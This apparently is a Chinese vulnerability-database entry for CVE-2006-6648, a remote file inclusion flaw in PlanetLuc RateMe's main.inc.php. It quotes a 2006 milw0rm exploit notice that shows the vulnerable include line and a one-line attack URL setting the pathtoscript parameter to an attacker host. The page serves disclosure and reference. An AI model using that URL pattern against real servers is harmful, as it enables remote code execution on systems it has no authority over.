PanetLuc.Com RateMe 'Main.Inc.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111787 漏洞类型 输入验证
发布时间 2006-12-18 更新时间 2007-01-03
CVE编号 CVE-2006-6648 CNNVD-ID CNNVD-200612-411
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2948
https://cxsecurity.com/issue/WLB-2006120117
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-411
|漏洞详情
planetluc.comRateMe1.3.2及早期版本的main.inc.php存在PHP远程文件包含漏洞,远程攻击者可以借助pathtoscript参数中的URL执行任意PHP代码。
|漏洞EXP
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                                 ;;ii,,::              +
+                                                 ::::            ::              ;;tt;;::              +
+                                                 ;;::          ...,,::            ;;ii,,::             +
+                           ,,,,                ii;;,,          ii;;::            ;;ii,,::              +
+                           ii::                tt;;,,        ..tt;;,,..          ;;ii;;::              +
+                         ii,,::                ttii,,        ..ff;;;;::          ;;ii;;::              +
+                         tt;;::..,,            tt;;,,          ff;;;;ii          ;;ii,,::              +
+                         tt;;::;;::            tt;;,,..        jj;;,,..          ;;tt,,::              +
+                         tt;;;;,,              tt;;,,..        tt;;;;            ;;ii;;::              +
+                     ..::,,;;,,                tt;;,,..        tt;;,,            ;;ii,,::              +
+                 ..::,,ii;;;;..                tt;;,,..        iiii,,::          ;;ii,,::              +
+               ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::          ;;ii,,::              +
+             ,,;;ii    tt;;,,                  ii;;,,..        ...jj;;::          ;;ii;;::             +
+           ;;;;::      tt;;::                  tt;;;;..          ff;;::          ;;tt,,..              +
+         ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,          ;;ii,,..              +
+       ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,          ;;ii;;..              +
+       tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,          ;;ii,,..              +
+       jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,          ;;ii,,..              +
+       ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,          ;;ii;;..              +
+           ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,          ;;ii,,..              +
+                       iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,          ;;ii;;                +
+                       ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::          ;;ii,,                +
+                         jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;            ;;ii,,                +
+                           jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::            ;;ii::                +
+                             iijjjjjjtt;;            ;;ffffjjjjtt::              ;;ii                  +
+                                                           ;;..                  ii;;                  +
+                                                                                 ..                    +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions =>  ( main.inc.php ) Remote File Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/  not free version
# Discovered: 15/12/2006
# Conatact : saudi[at]hotmail.fr - & -  al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
#
#  Description :
#  File infected : main.inc.php , line 17
#
#  echo "\n<!-- Start RateMe v$version output -->\n\n<link href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div class='votingtxt'>";
#  include($pathtoscript.'db_connect.inc.php');  # <==
#
#  Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
#
########################################################################################################

# milw0rm.com [2006-12-18]
|参考资料

来源:BID
名称:21642
链接:http://www.securityfocus.com/bid/21642
来源:BUGTRAQ
名称:20061218RateMe<=allversions=>(main.inc.php)RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/454708/100/0/threaded
来源:VUPEN
名称:ADV-2006-5058
链接:http://www.frsirt.com/english/advisories/2006/5058
来源:SECTRACK
名称:1017431
链接:http://securitytracker.com/id?1017431
来源:SREASON
名称:2049
链接:http://securityreason.com/securityalert/2049